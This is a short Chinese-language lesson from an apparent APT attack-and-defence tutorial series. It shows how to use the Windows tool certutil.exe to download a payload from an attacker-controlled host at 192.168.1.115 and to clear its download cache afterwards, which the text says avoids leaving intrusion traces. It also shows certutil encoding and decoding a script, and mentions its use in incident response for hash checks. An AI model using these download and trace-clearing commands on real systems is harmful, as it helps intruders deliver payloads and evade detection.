第三十八課:certutil一句話下載payload
專注APT攻擊與防御
https://micropoor.blogspot.com/

certutil微軟官方是這樣對它解釋的:
Certutil.exe是一個命令行程序,作為證書服務(wù)的一部分安裝。您可以使用Certutil.exe轉(zhuǎn)儲
和顯示證書頒發(fā)機(jī)構(gòu)(CA)配置信息,配置證書服務(wù),備份和還原CA組件以及驗(yàn)證證書,密鑰對和證書鏈。

url:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-
server-2012-R2-and-2012/cc732443(v=ws.11)

但是近些年好像被玩壞了。

靶機(jī):windows 2003 windows 7
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt
默認(rèn)下載為bin文件。但是不影響在命令行下使用。
certutil.exe下載有個弊端,它的每一次下載都有留有緩存,而導(dǎo)致留下入侵痕跡,所以每次下載后,需要馬上執(zhí)行如下:
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt delete
而在應(yīng)急中certutil也是常用工具之一,來對比文件hash,來判斷疑似文件。

Windows 2003:
Windows 7:
certutil的其它高級應(yīng)用:
C:>certutil -encode c:downfile.vbs downfile.bat
file:downfile.bat
解密:
file:downfile.txt
后者的話:powershell內(nèi)存加載配合certutil解密是一件非常有趣的事情。會在未來的系列中講述。

Micropoor
?